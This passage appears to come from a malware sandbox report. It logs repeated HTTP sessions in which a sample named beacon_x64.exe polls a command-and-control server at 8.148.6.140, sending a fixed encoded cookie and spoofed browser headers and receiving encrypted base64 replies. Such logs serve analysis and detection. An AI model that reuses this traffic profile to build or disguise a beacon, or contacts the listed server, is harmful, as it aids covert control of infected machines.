65 4b 45 79 34 69 75 72 52 4c 6a 36 71 35 6a 77 41 59 59 5a 2b 6f 6f 32 4c 64 36 6b 4c 4c 33 58 33 74 68 62 31 59 6a 6a 4c 58 76 77 50 63 4c 41 56 67 67 Data Ascii: 90uNfXv7hlZkwoLOrv3n1V8FkJZ/vf3AfbEB8knroCi0LWA1KM+CS69I3ud9A5C8n0nJjnhsNOU27rgIP/0xCEN70MaCkwB9QW62O9bsZheAigXgDqgJ1CHa96eOFcR4oRIH5GmVmTe//Ij0/6d2TnNcexEBn6Q+QZBV4SNJ2jhyJPzwhvW/ienTEMQhx1Y5nGVRc1qzsIkKxOSA5EC/eDzcDxj20dkLdmJ/Y2PxhY5yKcEqcz0/z3Ha8BRLKJEZdciG1OpH8M6C8eKEy4iurRLj6q5jwAYYZ+oo2Ld6kLL3X3thb1YjjLXvwPcLAVgg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49796	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:14.995476007 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:15.938654900 CET	357	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:15 GMT Server: nginx Content-Length: 172 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 46 33 73 6f 5a 2f 4e 6d 6f 71 53 71 4a 51 63 37 39 6b 6e 77 44 70 5a 33 73 58 4b 62 53 35 78 6b 7a 49 59 33 68 43 62 52 6b 48 78 7a 57 32 4a 63 70 36 4c 6c 44 64 38 57 5a 33 67 68 79 38 76 72 68 35 48 31 63 31 6a 7a 32 62 69 44 71 47 58 39 75 58 31 54 69 4a 4d 39 68 55 6c 34 54 4c 30 42 54 35 64 69 39 39 4a 71 53 4d 6f 6a 35 41 51 48 31 61 69 45 30 74 4a 45 69 42 5a 63 6d 64 5a 75 51 66 51 6a 59 6b 44 58 6a 4b 39 58 36 50 4c 35 64 43 68 33 47 48 52 52 58 6d 2f 2b 4a 35 43 54 42 73 31 73 39 71 59 58 6a 45 38 3d Data Ascii: F3soZ/NmoqSqJQc79knwDpZ3sXKbS5xkzIY3hCbRkHxzW2Jcp6LlDd8WZ3ghy8vrh5H1c1jz2biDqGX9uX1TiJM9hUl4TL0BT5di99JqSMoj5AQH1aiE0tJEiBZcmdZuQfQjYkDXjK9X6PL5dCh3GHRRXm/+J5CTBs1s9qYXjE8=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49803	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:16.060157061 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:20.026225090 CET	529	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:19 GMT Server: nginx Content-Length: 344 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 38 6a 75 45 53 6a 4f 59 6e 67 4c 61 35 69 64 49 50 61 61 5a 5a 34 66 41 42 55 52 31 53 4b 47 74 4b 33 74 56 2f 36 41 4d 34 4a 71 51 4a 63 51 64 34 4f 55 55 2f 6a 50 68 78 4a 64 74 74 58 68 4e 70 38 73 70 79 2f 51 69 4f 48 37 46 47 7a 2b 46 59 62 64 65 46 4d 73 44 5a 33 6e 4c 72 48 44 51 68 4b 75 6f 30 34 69 4e 51 44 6c 73 65 4c 4c 39 31 34 61 75 51 6e 53 59 6b 59 30 65 41 56 37 4e 49 66 45 2f 76 4a 2f 34 4d 44 63 70 6b 71 33 39 32 63 64 31 43 4f 34 4c 77 77 62 6c 53 31 66 4b 45 32 2b 6b 47 6e 2b 58 32 6a 74 76 62 50 76 4d 33 67 61 45 4e 47 33 37 66 49 6d 71 74 6d 31 43 56 56 46 4b 65 2f 47 63 42 31 53 55 39 30 6a 30 41 5a 4b 52 32 74 63 48 43 44 66 62 33 38 53 61 45 66 6d 6e 75 67 48 43 57 74 73 56 76 44 76 4a 43 66 73 63 63 6f 52 39 4c 6e 75 69 51 61 66 64 34 4f 46 59 32 76 44 6f 38 4b 75 7a 65 64 42 5a 44 4e 65 75 54 76 79 4a 79 4c 49 36 6a 4b 42 6a 47 77 75 38 63 32 77 44 65 39 53 37 51 37 55 74 77 37 6d 4b 38 6d 38 52 62 5a 67 5a 70 79 43 34 30 32 76 49 30 78 48 54 74 53 62 30 4d 38 67 37 49 34 [TRUNCATED] Data Ascii: 8juESjOYngLa5idIPaaZZ4fABUR1SKGtK3tV/6AM4JqQJcQd4OUU/jPhxJdttXhNp8spy/QiOH7FGz+FYbdeFMsDZ3nLrHDQhKuo04iNQDlseLL914auQnSYkY0eAV7NIfE/vJ/4MDcpkq392cd1CO4LwwblS1fKE2+kGn+X2jtvbPvM3gaENG37fImqtm1CVVFKe/GcB1SU90j0AZKR2tcHCDfb38SaEfmnugHCWtsVvDvJCfsccoR9LnuiQafd4OFY2vDo8KuzedBZDNeuTvyJyLI6jKBjGwu8c2wDe9S7Q7Utw7mK8m8RbZgZpyC402vI0xHTtSb0M8g7I4Mjcw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49829	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:20.140230894 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49852	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:24.263667107 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:28.246922016 CET	272	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:28 GMT Server: nginx Content-Length: 88 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 54 33 45 78 75 68 4c 56 61 58 69 41 6b 57 50 4f 2f 67 2f 70 2f 6f 47 56 34 50 33 74 47 5a 56 56 76 57 30 69 4d 6f 6b 53 2f 52 77 42 2f 48 62 39 50 6c 62 79 4a 6f 6b 52 79 76 30 41 66 49 6a 79 54 52 6d 47 43 46 41 70 54 74 6c 66 59 57 74 67 4d 33 30 53 73 51 3d 3d Data Ascii: T3ExuhLVaXiAkWPO/g/p/oGV4P3tGZVVvW0iMokS/RwB/Hb9PlbyJokRyv0AfIjyTRmGCFApTtlfYWtgM30SsQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49876	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:28.376948118 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:29.349307060 CET	401	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:29 GMT Server: nginx Content-Length: 216 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 65 55 79 6c 36 47 69 62 48 42 46 50 35 6f 41 75 64 76 6d 54 59 51 72 33 54 72 49 77 4f 76 78 44 44 36 52 64 44 49 4b 51 51 64 4d 33 4d 4a 4e 6e 6c 4c 69 61 6b 36 68 6a 70 64 31 59 49 6d 43 68 46 2b 76 6b 59 68 51 66 7a 52 51 56 63 4f 38 37 36 42 48 68 6c 31 55 6a 64 39 38 7a 30 6d 49 75 50 33 68 77 55 30 4d 55 32 53 4f 2b 6d 38 59 79 72 42 53 57 6e 66 2b 78 4d 62 67 7a 48 36 6e 6b 42 54 32 74 65 53 34 53 32 59 4f 44 46 31 74 32 52 79 4c 33 72 36 48 56 34 73 34 30 2f 4c 5a 54 67 67 79 43 52 61 4c 76 34 5a 64 4a 38 71 46 52 6d 31 4f 2f 31 6f 77 73 54 33 64 62 4e 51 63 43 31 56 69 59 48 2f 6e 41 31 39 6d 78 6d 62 4e 64 5a 6c 70 31 6a 77 3d 3d Data Ascii: eUyl6GibHBFP5oAudvmTYQr3TrIwOvxDD6RdDIKQQdM3MJNnlLiak6hjpd1YImChF+vkYhQfzRQVcO876BHhl1Ujd98z0mIuP3hwU0MU2SO+m8YyrBSWnf+xMbgzH6nkBT2teS4S2YODF1t2RyL3r6HV4s40/LZTggyCRaLv4ZdJ8qFRm1O/1owsT3dbNQcC1ViYH/nA19mxmbNdZlp1jw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49885	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:29.466532946 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:30.456492901 CET	357	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:30 GMT Server: nginx Content-Length: 172 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6e 7a 37 71 72 48 2b 43 72 42 69 61 35 6f 5a 38 49 54 47 6e 52 2b 46 47 49 59 69 5a 4e 43 79 45 64 4e 61 52 52 4c 4a 76 53 39 65 51 42 72 36 52 32 77 4a 41 30 6b 7a 57 59 78 50 6b 52 46 4e 2b 42 6a 63 65 77 55 56 6c 38 7a 75 33 50 6b 67 46 51 6d 43 48 45 61 32 62 71 41 46 41 74 6d 49 45 50 58 63 6a 42 73 63 75 2f 4c 74 62 39 71 47 52 54 35 4f 79 64 30 43 7a 65 76 4a 33 2b 64 62 38 43 32 4c 59 2b 39 32 68 6d 38 67 59 76 67 6a 30 74 7a 30 77 78 33 5a 47 4b 4a 52 6f 6c 66 61 31 6e 6e 7a 78 53 51 36 78 71 37 77 3d Data Ascii: nz7qrH+CrBia5oZ8ITGnR+FGIYiZNCyEdNaRRLJvS9eQBr6R2wJA0kzWYxPkRFN+BjcewUVl8zu3PkgFQmCHEa2bqAFAtmIEPXcjBscu/Ltb9qGRT5Oyd0CzevJ3+db8C2LY+92hm8gYvgj0tz0wx3ZGKJRolfa1nnzxSQ6xq7w=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49891	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:30.580194950 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49918	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:34.707501888 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:35.672286987 CET	185	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:35 GMT Server: nginx Content-Length: 108 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache
Jan 10, 2025 09:25:35.672787905 CET	108	IN	Data Raw: 71 61 4d 41 34 39 53 45 30 4c 75 66 4c 78 67 76 63 62 66 41 72 39 56 2b 70 74 66 31 33 73 31 76 71 52 75 66 32 6e 72 36 69 78 55 51 44 68 4b 62 67 35 56 52 78 41 4e 6c 2b 6e 67 68 78 6a 55 41 35 46 76 4f 55 54 78 67 51 46 32 54 32 50 36 4f 74 59 Data Ascii: qaMA49SE0LufLxgvcbfAr9V+ptf13s1vqRuf2nr6ixUQDhKbg5VRxANl+nghxjUA5FvOUTxgQF2T2P6OtYdelpNw2Lysf28rJIL3fTe0lio=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49927	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:35.797630072 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49951	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:39.966686964 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:40.969285011 CET	313	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:40 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 46 4d 2f 30 45 75 42 62 70 45 65 39 75 50 54 46 47 6a 50 31 6d 68 36 31 65 31 50 31 56 4c 49 48 71 4c 4d 4a 63 46 30 68 6f 55 75 36 42 45 43 68 7a 30 6b 6a 53 49 48 68 6b 2f 46 66 42 63 77 58 6b 53 39 4a 51 4e 73 48 37 36 39 6f 65 65 36 2b 4b 76 34 41 67 4d 64 4a 59 73 34 30 46 46 45 6b 66 67 78 41 4d 6c 56 6e 5a 63 67 50 6a 4e 6d 77 54 50 4d 6f 48 6a 64 37 33 57 4d 2b 51 4f 76 45 Data Ascii: FM/0EuBbpEe9uPTFGjP1mh61e1P1VLIHqLMJcF0hoUu6BEChz0kjSIHhk/FfBcwXkS9JQNsH769oee6+Kv4AgMdJYs40FFEkfgxAMlVnZcgPjNmwTPMoHjd73WM+QOvE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49961	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:41.091602087 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:42.065077066 CET	441	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:41 GMT Server: nginx Content-Length: 256 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6d 59 48 41 74 4e 71 66 31 77 5a 33 6d 70 65 6c 59 55 6c 51 72 43 59 65 66 38 62 55 54 44 62 6d 58 70 6c 59 4d 2f 5a 51 78 31 52 67 37 31 6b 63 76 49 72 7a 42 6c 31 46 55 36 46 50 41 48 55 48 77 55 65 39 53 46 66 64 51 32 70 30 36 63 54 36 52 76 6a 68 69 38 5a 53 70 31 56 65 4d 66 53 58 63 55 76 73 5a 6b 44 35 52 6d 38 6f 52 32 75 43 54 63 68 6b 4a 69 36 43 44 53 67 57 47 4d 66 37 62 32 45 6f 39 63 70 52 4c 4a 4c 55 48 42 4f 46 6b 50 6e 47 6f 30 54 79 34 33 64 45 78 70 32 71 76 61 45 70 38 6b 58 75 76 65 33 55 55 43 46 65 44 5a 41 42 56 41 74 6f 33 34 38 41 6d 68 6e 56 5a 35 5a 6c 61 53 4f 56 61 70 4b 63 30 7a 79 36 32 43 69 33 44 70 54 55 39 45 52 63 6b 77 2b 6d 56 56 4a 75 64 39 76 7a 4e 2b 69 4e 41 47 45 46 6e 37 35 43 55 2f 62 49 43 33 43 45 48 79 37 77 Data Ascii: mYHAtNqf1wZ3mpelYUlQrCYef8bUTDbmXplYM/ZQx1Rg71kcvIrzBl1FU6FPAHUHwUe9SFfdQ2p06cT6Rvjhi8ZSp1VeMfSXcUvsZkD5Rm8oR2uCTchkJi6CDSgWGMf7b2Eo9cpRLJLUHBOFkPnGo0Ty43dExp2qvaEp8kXuve3UUCFeDZABVAto348AmhnVZ5ZlaSOVapKc0zy62Ci3DpTU9ERckw+mVVJud9vzN+iNAGEFn75CU/bIC3CEHy7w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	49968	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:42.185496092 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:44.532581091 CET	549	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:44 GMT Server: nginx Content-Length: 364 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 78 2f 34 41 6f 45 4e 69 6f 67 6c 4c 77 6e 73 4c 33 69 39 4e 52 58 4d 74 58 76 51 68 64 6e 42 66 56 73 57 52 71 54 63 71 67 30 42 46 61 64 51 34 69 54 4c 50 2b 4e 51 70 45 5a 6b 69 78 49 77 52 64 56 48 62 53 51 50 43 52 33 52 42 4b 45 6d 41 52 61 46 51 64 79 32 79 63 4a 67 63 45 58 30 61 33 6b 73 36 2b 49 36 43 69 69 77 76 37 69 31 2f 72 57 49 57 4f 30 7a 52 6f 79 54 30 32 68 59 47 4d 75 66 72 71 30 64 30 79 31 6f 6a 45 61 46 31 49 39 77 36 2f 67 4a 73 72 6c 67 79 4e 39 5a 67 38 38 6a 51 78 7a 6b 65 42 77 6b 71 54 58 68 76 34 2b 41 4e 32 4b 64 56 52 33 2b 77 37 34 68 41 63 57 7a 6e 53 41 32 6c 4e 52 69 54 6a 67 72 76 4f 46 30 33 47 78 58 44 69 48 66 51 7a 7a 32 52 36 63 70 50 50 55 32 7a 73 59 59 4b 2f 49 50 69 2b 4c 50 68 46 41 39 77 36 69 37 72 72 38 6a 66 34 47 58 2b 39 53 58 63 36 74 6b 64 51 69 38 38 4d 61 74 41 69 36 72 6b 65 4c 32 57 61 6a 55 59 5a 35 6d 72 6b 2f 78 44 37 35 6b 6b 53 38 4f 6c 39 34 57 36 4a 4b 70 64 4b 57 4b 52 4e 46 31 4f 54 30 58 41 5a 2b 42 59 41 43 76 45 30 5a 46 50 53 71 [TRUNCATED] Data Ascii: x/4AoENioglLwnsL3i9NRXMtXvQhdnBfVsWRqTcqg0BFadQ4iTLP+NQpEZkixIwRdVHbSQPCR3RBKEmARaFQdy2ycJgcEX0a3ks6+I6Ciiwv7i1/rWIWO0zRoyT02hYGMufrq0d0y1ojEaF1I9w6/gJsrlgyN9Zg88jQxzkeBwkqTXhv4+AN2KdVR3+w74hAcWznSA2lNRiTjgrvOF03GxXDiHfQzz2R6cpPPU2zsYYK/IPi+LPhFA9w6i7rr8jf4GX+9SXc6tkdQi88MatAi6rkeL2WajUYZ5mrk/xD75kkS8Ol94W6JKpdKWKRNF1OT0XAZ+BYACvE0ZFPSqmjDxOvk/5iKUolFGgJCutITyo=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	49983	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 09:25:44.654841900 CET	544	OUT	GET /api/v1/get HTTP/1.1 Content-Type: text/plain Accept: / Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Accept-Encoding: gzip, deflate Priority: u=1, i Cookie: _UK=LcSK4d3VmW91QxpEP4Ljj1y9SyZt9aXe7sa59fAqRu8BEEOr1p56vGN3VxrDrO7FuxDrPEeOG15gH/vVc5ScRmNHe5GSyEV9a+bmUPtCLxgOV1ipTVzMu44IK1OJOMn7arDtHKsrLenmr4g3jfXSruS3zD6i/ehXDuuYcsfl7dc= User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Host: 8.148.6.140 Connection: Keep-Alive Cache-Control: no-cache
Jan 10, 2025 09:25:45.650706053 CET	313	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 08:25:45 GMT Server: nginx Content-Length: 128 Connection: keep-alive Content-Type: text/plain Cache-Control: no-cache Pragma: no-cache Data Raw: 6f 67 42 32 67 35 38 4f 68 59 48 6b 76 67 79 58 67 6f 7a 54 56 2b 6f 2b 55 35 71 62 53 72 51 39 55 78 51 46 44 32 37 30 6f 58 6b 5a 2f 37 6c 74 65 53 61 36 76 79 44 68 6b 6b 4a 38 6f 4e 39 57 31 74 6b 39 79 31 47 7a 79 34 6d 4b 49 55 67 4a 65 7a 6e 6d 52 6b 42 74 65 31 5a 4c 34 4a 31 66 49 67 45 35 6e 53 7a 33 41 72 52 43 32 56 78 43 67 30 61 4b 32 59 44 6b 4f 68 6d 69 57 52 6d 61 Data Ascii: ogB2g58OhYHkvgyXgozTV+o+U5qbSrQ9UxQFD270oXkZ/7lteSa6vyDhkkJ8oN9W1tk9y1Gzy4mKIUgJeznmRkBte1ZL4J1fIgE5nSz3ArRC2VxCg0aK2YDkOhmiWRma

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	49993	8.148.6.140	80	6456	C:\Users\user\Desktop\beacon_x64.exe

Timestamp	Bytes transferred	Direction	Data
